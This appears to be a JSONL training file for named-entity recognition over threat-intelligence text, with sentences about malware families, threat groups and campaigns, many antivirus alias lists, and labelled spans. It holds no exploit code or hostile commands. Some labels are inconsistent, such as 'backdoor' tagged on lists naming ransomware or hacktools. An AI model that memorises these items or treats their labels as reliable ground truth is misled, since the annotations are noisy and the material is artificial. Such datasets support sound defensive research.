{"text": "Just recently, we found a new spam campaign of Hancitor with some notable developments that may have been in the previous variants, but were not discussed in any other reports.", "spans": {"THREAT_ACTOR: new spam campaign": [[26, 43]], "MALWARE: Hancitor": [[47, 55]], "MALWARE: variants,": [[122, 131]]}, "info": {"id": "cyner2_train_006869", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Fadedoor.287744 Email-Worm.Win32.GOPworm.196 Trojan.Heur.rGWarTuQ32piy Win32.Trojan.WisdomEyes.16070401.9500.9787 W32/Backdoor.MAW Backdoor.Trojan Backdoor.Win32.Fadedoor.a Trojan.Win32.Fadedoor.frpv Backdoor.Win32.Fadedoor.287744 Backdoor.W32.Fadedoor.a!c Backdoor.Win32.Fadedoor.10 BackDoor.Fade.10 Backdoor.Fadedoor.Win32.22 W32/Backdoor.THLZ-3240 Backdoor/Fadedoor.i BDS/Fade.10.Srv1 Trojan[Backdoor]/Win32.Fadedoor Win32.Hack.Fadedoor.a.kcloud Backdoor:Win32/Fakedoor.B Backdoor.Win32.Fadedoor.a Worm/Win32.IRCBot.R67641 Email-Worm.Win32.GOPworm.196 TScope.Trojan.Delf Bck/Fadedoor.A Win32.Backdoor.Fadedoor.Efue Backdoor.Fadedoor!nYSsZcqQ6hQ W32/Fadedoor.A!tr Win32/Trojan.fd1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006870", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Downloader.VB.lvv W32/Downldr2.FUOC DLoader.APBLQ TROJ_SPNR.07L611 Win32.HEURCrypted Trojan.Downloader-71476 Trojan-Downloader.Win32.VB.lwz Trojan.DL.VB!n7YxP+4/z6k Trojan.Win32.Downloader.94208.EO Virus.Win32.Heur.k TrojWare.Win32.Trojan.VB.~BVZ Trojan.DownLoad1.50365 TROJ_SPNR.0CA512 TrojanDownloader.VB.rbu Win32.TrojDownloader.VB.kcloud W32/Downloader.RCLB-8389 Win-Trojan/Xema.variant TrojanDownloader.VB Trojan-Downloader.Win32.VB W32/VB.LVV!tr.dldr Trj/Downloader.VVG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006872", "source": "cyner2_train"}}
{"text": "AsyncRAT is a popular malware commodity and tools used by attackers to gain access to targeted hosts or networks, including those using Microsoft's OneNote email address.", "spans": {"MALWARE: AsyncRAT": [[0, 8]], "MALWARE: malware": [[22, 29]], "MALWARE: tools": [[44, 49]], "THREAT_ACTOR: attackers": [[58, 67]], "SYSTEM: networks,": [[104, 113]], "SYSTEM: Microsoft's OneNote": [[136, 155]]}, "info": {"id": "cyner2_train_006873", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D1D44E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006874", "source": "cyner2_train"}}
{"text": "JPCERT / CC confirms that a targeted mail with a ZIP file containing an executable file has been sent to domestic organizations around October 2016.", "spans": {"ORGANIZATION: JPCERT": [[0, 6]], "ORGANIZATION: CC": [[9, 11]], "ORGANIZATION: domestic organizations": [[105, 127]]}, "info": {"id": "cyner2_train_006875", "source": "cyner2_train"}}
{"text": "Recently, we have discovered 132 Android apps on Google Play infected with tiny hidden IFrames that link to malicious domains in their local HTML pages, with the most popular one having more than 10,000 installs alone.", "spans": {"SYSTEM: Android apps on Google Play": [[33, 60]]}, "info": {"id": "cyner2_train_006877", "source": "cyner2_train"}}
{"text": "The threat actors target a wide range of organizations: CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects, but also targeting other industry verticals and attacking organizations involved in international relations.", "spans": {"THREAT_ACTOR: The threat actors": [[0, 17]], "ORGANIZATION: CTU researchers": [[56, 71]], "THREAT_ACTOR: TG-3390": [[86, 93]], "ORGANIZATION: defense": [[132, 139]], "ORGANIZATION: industry": [[189, 197]], "ORGANIZATION: organizations": [[222, 235]], "ORGANIZATION: international relations.": [[248, 272]]}, "info": {"id": "cyner2_train_006878", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9607 Trojan.Win32.DownLoad4.exjknn Trojan.DownLoad4.114 Trojan/Win32.Cerber.R219560 Trojan.BitCoinMiner Trojan.Zusy.D42D87 Trj/CI.A Win32/Trojan.5a2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006880", "source": "cyner2_train"}}
{"text": "The attackers used compromised websites or watering holes to infect pre-selected targets with previously unknown malware.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: unknown malware.": [[105, 121]]}, "info": {"id": "cyner2_train_006881", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Downloader.Kather.e Win32.Trojan.WisdomEyes.16070401.9500.9855 W32/Downldr2.ANMO Backdoor.Trojan WORM_POSAM.A Win.Trojan.Kather-1 Trojan-Downloader.Win32.Kather.e Trojan.Win32.Kather.dips Win32.Trojan-downloader.Kather.Tdfl TrojWare.Win32.TrojanDownloader.Kather.E Trojan.Kather.43661 Downloader.Kather.Win32.6 WORM_POSAM.A W32/Downloader.KXIZ-5728 Trojan/Kather.i TR/Dldr.Kather.E Trojan[Downloader]/Win32.Kather Win32.TrojDownloader.Kather.e.kcloud Troj.Downloader.W32.Kather.e!c Trojan-Downloader.Win32.Kather.e TrojanDownloader:Win32/Kather.E Win32/TrojanDownloader.Kather.E Trojan.DL.Kather!WhdeU9hib+w W32/Kather.A!tr.dldr Win32/Trojan.b64", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006884", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VBTipocadLTJ.Trojan Trojan/W32.Reconyc.95744 Trojan.Reconyc Trojan.Win32.Reconyc.ghqx Trojan.Win64.Reconyc.ewbtpt Troj.W32.Reconyc.tnqK BehavesLike.Win64.Downloader.nh Trojan.Win32.Reconyc TR/Dropper.onknt TrojanDownloader:Win32/Reconyc.B!bit Trojan.Win32.Reconyc.ghqx Trojan/Win64.Reconyc.C1746256 Trojan.Reconyc Trojan.Reconyc Trj/CI.A VBS/Kryptik.D Win32.Trojan.Reconyc.Hwdh Trojan.Reconyc! Win32/Trojan.658", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006885", "source": "cyner2_train"}}
{"text": "We discovered this China-based third-party iOS app store aggressively promoting their repackaged apps in social network channels—YouTube, Facebook, Google+, and Twitter—banking on the popularity of games and apps such as Minecraft, Terraria, and Instagram to lure users into downloading them.", "spans": {"SYSTEM: China-based third-party iOS app store": [[19, 56]], "SYSTEM: channels—YouTube, Facebook, Google+,": [[120, 156]], "SYSTEM: Twitter—banking": [[161, 176]], "SYSTEM: games": [[198, 203]], "SYSTEM: apps": [[208, 212]], "SYSTEM: Minecraft, Terraria,": [[221, 241]], "SYSTEM: Instagram": [[246, 255]]}, "info": {"id": "cyner2_train_006886", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Sirefef.A Trojan.CoinMiner.Win32.474 Trojan.Kazy.D54A3A Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Limitail Trojan.Win32.Yakes.cvappu Troj.W32.Yakes.egne!c Trojan.BtcMine.148 BehavesLike.Win32.Downloader.fh Trojan.Win32.CoinMiner W32/Trojan.XYUN-7891 Trojan/Yakes.mzh TR/Rogue.1594174 Trojan/Win32.Yakes Trojan:Win32/Kraziomel.D Trojan/Win32.Yakes.C284072 Trojan.TDSS.01414 Win32/CoinMiner.CF Trojan.Yakes!WgDSy6aOE8s W32/Kryptik.EXA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006887", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.NSIS.Androm.8 Troj.Nsis.Androm!c Win32.Trojan.WisdomEyes.16070401.9500.9791 Ransom.Rokku Ransom_.97182692 Zum.Ransom.NSIS.Cerber.1 Trojan-Ransom.Win32.Zcryptor.g Trojan.NSIS.Androm.8 Trojan.Win32.Inject.evkooj Trojan.Win32.Z.Injector.697990 Ransom_.97182692 BehavesLike.Win32.Ransom.jc Trojan.Win32.Injector Ransom:Win32/ZCryptor.A Trojan-Ransom.Win32.Zcryptor.g Trojan-Ransom.Zcryptor Trj/CI.A Zum.Ransom.NSIS.Cerber.1 Win32.Trojan.Zcryptor.Lndy Win32/Trojan.Ransom.a9f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006889", "source": "cyner2_train"}}
{"text": "Slowly putting the pieces together, the global picture began to take shape, exposing a massive adware campaign affecting approximately half a million users.", "spans": {"THREAT_ACTOR: massive adware campaign": [[87, 110]], "ORGANIZATION: half a million users.": [[135, 156]]}, "info": {"id": "cyner2_train_006890", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Trojan.Banker.DF Android.Trojan.Banker.DF Other:Android.Reputation.2 Infostealer.Bancos Android.Trojan.Banker.DF HEUR:Trojan-Banker.AndroidOS.Svpeng.q A.H.Pri.SvPeng.E Trojan.Android.Banker.egowei Trojan:Android/InfoStealer.CM Android.Banker.70.origin ZIP/Trojan.IGVK-5 Android.Trojan.Banker.DF Android-Trojan/Svpeng.3becd HEUR:Trojan-Banker.AndroidOS.Svpeng.q Trojan.AndroidOS.Banker.A a.expense.fakeinstall.b Trojan-Banker.AndroidOS.Svpeng", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006891", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.MSIL Trojan.SpamThru Trojan.DownLoader25.28452 BehavesLike.Win32.Trojan.wm TR/Dropper.MSIL.qtean Backdoor:VBS/Sisbot.A Trojan.MSIL.Androm.9 Trojan/Win32.Sisbot.R216242 Trj/GdSda.A MSIL/Dropper.XXX!tr Win32/Trojan.b5b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006892", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.A728 Trojan.PWS.OnlineGames.AADX Trojan-GameThief.Win32.OnLineGames!O Trojan.PWS.OnlineGames.AADX Trojan/OnLineGames.snrt Win32.Trojan.WisdomEyes.16070401.9500.9990 Infostealer.Gampass TROJ_SYSTEMHI.IM Win.Spyware.50098-2 Trojan-GameThief.Win32.OnLineGames.snrt Trojan.PWS.OnlineGames.AADX Trojan.Win32.Drop.bbdxzx Trojan.PWS.OnlineGames.AADX Trojan.PWS.OnlineGames.AADX Trojan.MulDrop.21159 TROJ_SYSTEMHI.IM Backdoor/Bifrose.jhl Trojan[GameThief]/Win32.OnLineGames Trojan.PWS.OnlineGames.AADX Trojan.Win32.PSWIGames.21508 Trojan-GameThief.Win32.OnLineGames.snrt Trojan.PWS.OnlineGames.AADX Trojan/Win32.OnlineGameHack.R10533 Win32.Trojan-GameThief.Onlinegames.cruv Trojan-PWS.LDPinch", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006894", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Androm.A5 Win32.Trojan.WisdomEyes.16070401.9500.9994 Virus.W32.Rootkit!c Trojan.Inject2.30717 Trojan.Kryptik.Win32.1154178 Trojan.Win32.Crypt Trojan.Scarsi.ait Trojan/Win32.Scarsi Trojan.Win32.Z.Kryptik.563972 W32/Dorkbot.B!tr Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006895", "source": "cyner2_train"}}
{"text": "Microsoft refers to this family of malware as Sarvdap, however it must be noted that the detection appears somewhat generic.", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "MALWARE: malware": [[35, 42]], "MALWARE: Sarvdap,": [[46, 54]]}, "info": {"id": "cyner2_train_006896", "source": "cyner2_train"}}
{"text": "FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015.", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: threat group": [[32, 44]]}, "info": {"id": "cyner2_train_006897", "source": "cyner2_train"}}
{"text": "The set of permissions required by Marcher according to the manifest is as follows : ∗ android.permission.CHANGE_NETWORK_STATE ( change network connectivity state ) ∗ android.permission.SEND_SMS ( send SMS messages ) ∗ android.permission.USES_POLICY_FORCE_LOCK ( lock the device ) ∗ android.permission.RECEIVE_BOOT_COMPLETED ( start malware when device boots ) ∗ android.permission.INTERNET ( communicate with the internet ) ∗ android.permission.VIBRATE ( control the vibrator ) ∗ android.permission.ACCESS_WIFI_STATE ( view information about the status of Wi-Fi ) ∗ android.permission.WRITE_SMS ( edit/delete SMS ) ∗ android.permission.ACCESS_NETWORK_STATE ( view the status of all networks ) ∗ android.permission.WAKE_LOCK ( prevent the phone from going to sleep ) ∗ android.permission.GET_TASKS ( retrieve running applications ) ∗ android.permission.CALL_PHONE ( call phone numbers ) ∗ android.permission.WRITE_SETTINGS ( read/write global system settings ) ∗ android.permission.RECEIVE_SMS ( intercept SMS messages ) ∗ android.permission.READ_PHONE_STATE ( read phone details of the device such as phone number and serial number ) ∗ android.permission.CHANGE_WIFI_STATE ( connect to and disconnect from Wi-Fi networks and make changes to configured networks ) ∗ android.permission.READ_CONTACTS ( read all contact data ) * android.permission.READ_SMS ( read SMS messages ) Obviously a fairly significant list of permissions of which many are suspicious , especially when combined .", "spans": {"MALWARE: Marcher": [[35, 42]]}, "info": {"id": "cyner2_train_006900", "source": "cyner2_train"}}
{"text": "In December 2015, Chinese users reported they were infected by this malware.", "spans": {"ORGANIZATION: Chinese users": [[18, 31]], "MALWARE: malware.": [[68, 76]]}, "info": {"id": "cyner2_train_006901", "source": "cyner2_train"}}
{"text": "We took a look at the malware specifically in the INOCNATION campaign to analyze what was new and different about the techniques used by the threat actor.", "spans": {"MALWARE: malware": [[22, 29]], "THREAT_ACTOR: INOCNATION campaign": [[50, 69]], "THREAT_ACTOR: threat actor.": [[141, 154]]}, "info": {"id": "cyner2_train_006902", "source": "cyner2_train"}}
{"text": "New nodes are continually added as new victims are enlisted, and they are unpublished outside of the Terracotta user-base.", "spans": {"MALWARE: Terracotta": [[101, 111]], "SYSTEM: user-base.": [[112, 122]]}, "info": {"id": "cyner2_train_006903", "source": "cyner2_train"}}
{"text": "With the prevalence of Google Android smartphones and the popularity of feature-rich apps, more and more people rely on smartphones to store and handle kinds of personal and business information which attracts adversaries who want to steal that information.", "spans": {"ORGANIZATION: Google": [[23, 29]], "SYSTEM: Android smartphones": [[30, 49]], "SYSTEM: smartphones": [[120, 131]], "THREAT_ACTOR: adversaries": [[210, 221]]}, "info": {"id": "cyner2_train_006904", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Zbot.VA3 Trojan.Tofsee Trojan/Injector.ccfi TROJ_HPVB.SM6 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom.Kovter TROJ_HPVB.SM6 Trojan.Win32.Inject.wlzt Trojan.Win32.Inject.dwzyvq Troj.W32.Inject.tnFQ Trojan.Kovter.69 Trojan.Inject.Win32.168460 Trojan.Win32.Injector Trojan/Inject.baac Trojan/Win32.Inject Trojan.Symmi.DCC5C Trojan.Win32.Inject.wlzt Trojan/Win32.Kovter.R153629 Trojan.Inject Trojan.Inject!3ypDMCpDv7Y W32/Injector.CEEO!tr Win32/Trojan.Dropper.43b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006907", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Mytob Win32.Trojan.WisdomEyes.16070401.9500.9860 W32/Trojan.DMPW-1529 Net-Worm.Win32.Mytob.lsk Trojan.Win32.Win32.dchvpv Trojan.Win32.Z.Mytob.27648 Net.Worm.W32.Mytob!c Trojan.Win32.Clicker!BT Worm/Mytob.als TR/Clicker.ofeiu Worm[Net]/Win32.Mytob Net-Worm.Win32.Mytob.lsk TrojanClicker:MSIL/Doviali.A Worm/Win32.Mytob.C84872 Trojan.Win32.Clicker!BT Net-Worm.Mytob Trojan.MSIL.TrojanClicker W32/MyTob.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006908", "source": "cyner2_train"}}
{"text": "Trend Micro detects this as ANDROIDOS_SOCKSBOT.A and has found at least 3,000 Trojanized apps.", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "MALWARE: 3,000 Trojanized apps.": [[72, 94]]}, "info": {"id": "cyner2_train_006912", "source": "cyner2_train"}}
{"text": "This post analyzes targeted malware attacks against groups in the Tibetan diaspora and pro-democracy groups in Hong Kong.", "spans": {"MALWARE: malware attacks": [[28, 43]]}, "info": {"id": "cyner2_train_006914", "source": "cyner2_train"}}
{"text": "In October 2015 the Callisto Group targeted a handful of individuals with phishing emails that attempted to obtain the target's webmail credentials.", "spans": {"THREAT_ACTOR: the Callisto Group": [[16, 34]], "ORGANIZATION: individuals": [[57, 68]]}, "info": {"id": "cyner2_train_006918", "source": "cyner2_train"}}
{"text": "On January 27, 2016 Cyphort Labs discovered a site infected with Angler EK leading to a fileless Gootkit a.k.a. XswKit malware.", "spans": {"ORGANIZATION: Cyphort Labs": [[20, 32]], "MALWARE: Angler EK": [[65, 74]], "MALWARE: Gootkit": [[97, 104]], "MALWARE: XswKit malware.": [[112, 127]]}, "info": {"id": "cyner2_train_006919", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Foosace Trojan.Sofacy.C TSPY_SEDNIT.A Trojan.Win32.Z.Graftor.81408.L TSPY_SEDNIT.A W32/Trojan.GBLK-5942 Trojan:Win32/Foosace.K!dha Trojan/Win32.Sednit.R155481 Win32/Sednit.C Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006920", "source": "cyner2_train"}}
{"text": "Two prominent lawyers representing the families of three slain Mexican women were sent infection attempts with NSO Group's Pegasus spyware", "spans": {"ORGANIZATION: lawyers": [[14, 21]], "ORGANIZATION: families": [[39, 47]], "ORGANIZATION: three slain Mexican women": [[51, 76]], "THREAT_ACTOR: NSO Group's": [[111, 122]], "MALWARE: Pegasus spyware": [[123, 138]]}, "info": {"id": "cyner2_train_006921", "source": "cyner2_train"}}
{"text": "htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in Chinese cyberattackers' campaign against Association of Southeast Asian Nations ASEAN.", "spans": {"MALWARE: htpRAT,": [[0, 7]], "ORGANIZATION: RiskIQ cyber investigators,": [[21, 48]], "MALWARE: weapon": [[63, 69]], "THREAT_ACTOR: Chinese cyberattackers' campaign": [[73, 105]], "ORGANIZATION: Association of Southeast Asian Nations ASEAN.": [[114, 159]]}, "info": {"id": "cyner2_train_006922", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 PWS:MSIL/Logbro.A Trojan/Win32.Skeeyah.R207512 MSIL.Backdoor.SRat.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006923", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.DP.ED408E Ransom_Delcryset.R055C0DAF18 Trojan-Ransom.Win32.Matrix.qt Trojan.Win32.Matrix.ewhoom Trojan.DownLoader26.4261 Ransom_Delcryset.R055C0DAF18 BehavesLike.Win32.BadFile.dh W32/Trojan.YJSB-6810 TR/AD.RansomHeur.ulxhr Ransom:Win32/Delcryset.A Trojan-Ransom.Win32.Matrix.qt Trj/GdSda.A W32/Filecoder_LockedFile.D!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006924", "source": "cyner2_train"}}
{"text": "These tools include: HKTL_MIMIKATZ, HKTL_FGDUMP, and HKTL_VNCPASSVIEW.", "spans": {"MALWARE: tools": [[6, 11]]}, "info": {"id": "cyner2_train_006928", "source": "cyner2_train"}}
{"text": "FIN7 is a financially-motivated threat actor targeting large organizations that process payment card data or have a significant point of sale environment.", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: threat actor": [[32, 44]], "ORGANIZATION: organizations": [[61, 74]], "SYSTEM: point of sale environment.": [[128, 154]]}, "info": {"id": "cyner2_train_006929", "source": "cyner2_train"}}
{"text": "This dissimilarity only grew with the further enumeration of other targets, describing a broad targeting across the Middle East without wholly implicating any particular interest, despite clear political intent.", "spans": {}, "info": {"id": "cyner2_train_006930", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.B82E Trojan.Nsis.Dwn.ewrrol BehavesLike.Win32.Vopak.cc Trojan.Inject.acan TrojanDownloader:Win32/Tanske.A!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006932", "source": "cyner2_train"}}
{"text": "The malware is responsible for encrypting files on a victim's machine and demanding a ransom via the Bitcoin cryptocurrency.", "spans": {"MALWARE: malware": [[4, 11]], "SYSTEM: victim's machine": [[53, 69]]}, "info": {"id": "cyner2_train_006933", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ekidoa.FC.2847 Trojan.MSILPerseus.D1EE89 Win32.Trojan.WisdomEyes.16070401.9500.9998 TrojWare.MSIL.Ekidoa.A BackDoor.Bladabindi.13678 Trojan.MSIL.Crypt TR/Dropper.MSIL.hoclc MSIL/Kryptik.FDF!tr Trojan:MSIL/Ekidoa.A!bit Trojan/Win32.Skeeyah.R194563 Backdoor.MSIL.SpyGate Backdoor.Bladabindi Backdoor.SpyGate!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006934", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/FlyStudio.atk Win.Trojan.7691310-1 Trojan-Dropper.Win32.Dinwod.vqz Trojan.Win32.FlyStudio.zlxrd Trojan.PWS.Wsgame.36294 BehavesLike.Win32.Ipamor.fc Trojan/FlyStudio.dpn Trojan/Win32.FlyStudio Trojan:Win32/Derunsex.A Troj.W32.FlyStudio.atk!c Trojan-Dropper.Win32.Dinwod.vqz Trj/CI.A Win32.Trojan.Flystudio.dbsu Trojan.Crypt W32/FlyStudio.ATK!tr Win32/Trojan.0e3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006935", "source": "cyner2_train"}}
{"text": "On March 29, 2023, reports circulating about a potential supply chain compromise for 3CXDesktopApp — a softphone application from 3CX.", "spans": {"VULNERABILITY: compromise": [[70, 80]], "SYSTEM: 3CXDesktopApp": [[85, 98]], "SYSTEM: softphone application": [[103, 124]], "ORGANIZATION: 3CX.": [[130, 134]]}, "info": {"id": "cyner2_train_006936", "source": "cyner2_train"}}
{"text": "Distribution via trojanized updates to MeDoc users", "spans": {"MALWARE: trojanized updates": [[17, 35]], "ORGANIZATION: MeDoc users": [[39, 50]]}, "info": {"id": "cyner2_train_006937", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.Crypren.11 Ransom_Denisca.R011C0DLD17 Ransom_Denisca.R011C0DLD17 Trojan.Win32.Crypren.emfrxs Trojan.MulDrop7.20062 BehavesLike.Win32.PWSZbot.dc Trojan.Win32.Crypt W32/Trojan.HSTQ-8964 TR/AD.Ergop.ipwuu Trj/CI.A Trojan.Crypren!pGn+9M0dsUI W32/Kryptik.FPNC!tr Win32/Trojan.Ransom.a8a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006938", "source": "cyner2_train"}}
{"text": "This included altering the icon of the executable to appear as other file types as well as decoy documents to trick users into thinking they had opened a legitimate file.", "spans": {}, "info": {"id": "cyner2_train_006940", "source": "cyner2_train"}}
{"text": "What do I need to do ? It is extremely unlikely you or someone you know was affected by Chrysaor malware .", "spans": {"MALWARE: Chrysaor": [[88, 96]]}, "info": {"id": "cyner2_train_006941", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Risk.Deceptor.Lmla Program.Unwanted.2594 Trojan:Win32/Spideepri.A PUP/Win32.SpeedItUpFree.R211310 Trojan.Spideepri", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006944", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mimikatz.Win32.268 Win32.Trojan.WisdomEyes.16070401.9500.9999 Hacktool.Mimikatz Trojan.Win32.Mimikatz.ergkpd Application.Win32.HackTool.Mimikatz.DC Tool.PassView.1872 HackTool.Inject.ew Trojan[PSW]/Win32.Mimikatz Trojan/Win32.Mimikatz.R202679 TrojanPSW.Mimikatz HackTool.Mimikatz Trj/CI.A Trojan.Application.Hacktool.Mimikatz.1 Win32.Trojan-qqpass.Qqrob.Tclv HackTool.Mimikatz hacktool.mimikatz Win32/Trojan.PSW.c71", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006945", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Olufus.A3 WORM_VB_FB25010D.UVPM Win32.Worm.VB.rb WORM_VB_FB25010D.UVPM Trojan.Win32.Cosmu.dipp Trojan.Win32.Crypt.dsqpuq Trojan.MulDrop5.34309 Net-Worm.Win32.Cynic Worm:Win32/Olufus.A Trojan.Heur.E2E727 W32.Virut.low6 Trojan.Win32.Cosmu.dipp Trojan/Win32.Bredolab.R151314 TScope.Trojan.VB Win32/VB.OKI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006946", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.KlassTT.Trojan Backdoor.Sdbot.6331 Troj.Dropper.W32.Sysn!c Win32.Trojan.WisdomEyes.16070401.9500.9991 Backdoor.Trojan Trojan-Dropper.Win32.Sysn.brns Backdoor.Win32.IRCBot.60928.J BackDoor.IRC.Huxor.59 BehavesLike.Win32.Backdoor.qh Backdoor.Win32.SdBot Trojan[Backdoor]/Win32.IRCBot Trojan.Kazy.D14BCA Trojan-Dropper.Win32.Sysn.brns Backdoor:Win32/Arwobot.B Worm/Win32.IRCBot.R4516 Win32.Trojan-dropper.Sysn.Lmuh Win32/Trojan.8b1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006947", "source": "cyner2_train"}}
{"text": "These embedded OLE Word documents then contain embedded Adobe Flash .SWF files that are designed to exploit Abode Flash vulnerabilities.", "spans": {"VULNERABILITY: exploit Abode Flash vulnerabilities.": [[100, 136]]}, "info": {"id": "cyner2_train_006948", "source": "cyner2_train"}}
{"text": "Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015.", "spans": {"THREAT_ACTOR: Iranian threat agent OilRig": [[0, 27]], "ORGANIZATION: multiple organisations": [[47, 69]]}, "info": {"id": "cyner2_train_006949", "source": "cyner2_train"}}
{"text": "In the course of this tactical hunt for unidentified code, RSA discovered a sophisticated attack on a software supply-chain involving a Trojan inserted in otherwise legitimate software; software that is typically used by enterprise system administrators.", "spans": {"ORGANIZATION: software supply-chain": [[102, 123]], "MALWARE: Trojan": [[136, 142]], "SYSTEM: legitimate software; software": [[165, 194]], "SYSTEM: enterprise system administrators.": [[221, 254]]}, "info": {"id": "cyner2_train_006950", "source": "cyner2_train"}}
{"text": "Neuron and Nautilus are malicious tools designed to operate on Microsoft Windows platforms, primarily targeting mail servers and web servers.", "spans": {"MALWARE: Neuron": [[0, 6]], "MALWARE: Nautilus": [[11, 19]], "MALWARE: malicious tools": [[24, 39]], "SYSTEM: Microsoft Windows platforms,": [[63, 91]], "ORGANIZATION: mail servers": [[112, 124]], "ORGANIZATION: web servers.": [[129, 141]]}, "info": {"id": "cyner2_train_006951", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.MambaAHQc.Trojan Trojan.Python.Win32.34 Trojan/Mamba.g Win32.Trojan.WisdomEyes.16070401.9500.9555 BehavesLike.Win32.Trojan.vh Python/Blakamba.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006952", "source": "cyner2_train"}}
{"text": "The attack compromised their devices and exfiltrated data to the attackers' command and control server.", "spans": {"SYSTEM: devices": [[29, 36]], "THREAT_ACTOR: attackers'": [[65, 75]]}, "info": {"id": "cyner2_train_006954", "source": "cyner2_train"}}
{"text": "The earliest we observed this spreader variant pushing Mirai downloaders was January 2017.", "spans": {"MALWARE: Mirai downloaders": [[55, 72]]}, "info": {"id": "cyner2_train_006957", "source": "cyner2_train"}}
{"text": "In late 2013­­­–early 2014, a compromised FTP client dubbed StealZilla, based off the open source FileZilla FTP client was discovered.", "spans": {"MALWARE: StealZilla,": [[60, 71]], "SYSTEM: FTP client": [[108, 118]]}, "info": {"id": "cyner2_train_006958", "source": "cyner2_train"}}
{"text": "This particular APT is targeting organizations that include weapons manufacturers, human rights activists, and pro-democracy groups, among others.", "spans": {"THREAT_ACTOR: APT": [[16, 19]], "ORGANIZATION: organizations": [[33, 46]], "ORGANIZATION: weapons manufacturers, human rights activists,": [[60, 106]], "ORGANIZATION: pro-democracy groups,": [[111, 132]]}, "info": {"id": "cyner2_train_006959", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Danmec.E.iw5 Trojan.Asprox W32/Danmec.R TROJ_DANMEC.SM Trojan.Win32.Danmec!IK TrojWare.Win32.Kryptik.CG Trojan.DownLoad2.37322 TR/Spy.Web.H TROJ_DANMEC.SM Worm/Aspxor.ey Trojan/Win32.Danmec Trojan.Danmec Trojan.Asprox!rem Trojan.Win32.Danmec W32/Danmec.C!tr Trj/Damnec.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006960", "source": "cyner2_train"}}
